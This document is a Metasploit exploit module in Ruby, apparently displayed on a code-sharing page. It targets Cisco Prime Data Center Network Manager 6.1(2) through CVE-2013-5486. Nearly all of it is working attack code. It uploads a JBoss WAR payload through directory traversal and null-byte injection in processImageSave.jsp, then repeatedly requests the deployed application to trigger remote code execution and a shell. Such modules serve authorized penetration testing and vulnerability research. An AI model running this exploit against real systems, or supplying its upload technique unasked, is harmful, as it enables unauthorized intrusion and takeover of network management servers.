Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::FileDropper
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'        => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
15
      'Description' => %q{
16
        This module exploits a code execution flaw in Cisco Data Center Network Manager. The
17
        vulnerability exists in processImageSave.jsp, which can be abused through a directory
18
        traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
19
        application server feature is used to achieve remote code execution. This module has been
20
        tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
21
        (64 bits).
22
      },
23
      'Author'       =>
24
        [
25
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
26
          'juan vazquez' # Metasploit module
27
        ],
28
      'License'     => MSF_LICENSE,
29
      'References'  =>
30
        [
31
          [ 'CVE', '2013-5486'],
32
          [ 'OSVDB', '97426' ],
33
          [ 'ZDI', '13-254' ],
34
          [ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
35
        ],
36
      'Privileged'  => true,
37
      'Platform'    => 'java',
38
      'Arch'        => ARCH_JAVA,
39
      'Targets'     =>
40
        [
41
          [ 'Cisco DCNM 6.1(2) / Java Universal',
42
            {
43
              'AutoDeployPath' => "../../../../../deploy",
44
              'CleanupPath'    => "../../jboss-4.2.2.GA/server/fm/deploy"
45
            }
46
          ]
47
        ],
48
      'DefaultTarget'  => 0,
49
      'DisclosureDate' => '2013-09-18'))
50

51
    register_options(
52
      [
53
        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
54
        OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
55
      ])
56
  end
57

58
  def upload_file(location, filename, contents)
59
    res = send_request_cgi(
60
      {
61
        'uri'         => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
62
        'method'      => 'POST',
63
        'encode_params' => false,
64
        'vars_post'   =>
65
          {
66
            "mode"     => "save",
67
            "savefile" => "true",
68
            "chartid"  => "#{location}/#{filename}%00",
69
            "data"     => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
70
          }
71
      })
72

73
    if res and res.code == 200 and res.body.to_s =~ /success/
74
      return true
75
    else
76
      return false
77
    end
78
  end
79

80
  def check
81
    version = ""
82

83
    res = send_request_cgi({
84
      'url'    => target_uri.to_s,
85
      'method' => 'GET'
86
    })
87

88
    unless res
89
      vprint_error("Connection timed out")
90
      return Exploit::CheckCode::Unknown
91
    end
92

93
    if res.code == 200 and
94
        res.body.to_s =~ /Data Center Network Manager/ and
95
        res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
96
      version = $1
97
      vprint_status("Cisco Primer Data Center Network Manager version #{version} found")
98
      if version =~ /6\.1/
99
        return Exploit::CheckCode::Appears
100
      else
101
        return Exploit::CheckCode::Detected
102
      end
103

104
    elsif res.code == 200 and res.body.to_s =~ /Data Center Network Manager/
105
      return Exploit::CheckCode::Detected
106
    end
107

108
    Exploit::CheckCode::Safe
109
  end
110

111
  def exploit
112
    attempts = datastore['ATTEMPTS']
113
    fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
114

115
    app_base = rand_text_alphanumeric(4+rand(32-4))
116

117
    # By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
118
    # Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
119
    # Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
120
    war = payload.encoded_war({ :app_name => app_base }).to_s
121
    war_filename = "#{app_base}.war"
122
    war_location = target['AutoDeployPath']
123

124
    print_status("Uploading WAR file #{war_filename}...")
125
    res = upload_file(war_location, war_filename, war)
126

127
    if res
128
      register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
129
    else
130
      fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
131
    end
132

133

134
    attempts.times do
135
      select(nil, nil, nil, 2)
136

137
      # Now make a request to trigger the newly deployed war
138
      print_status("Attempting to launch payload in deployed WAR...")
139
      res = send_request_cgi(
140
        {
141
          'uri'    => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
142
          'method' => 'GET'
143
        })
144
      # Failure. The request timed out or the server went away.
145
      fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
146
      # Success! Triggered the payload, should have a shell incoming
147
      break if res.code == 200
148
    end
149
  end
150
end
151

152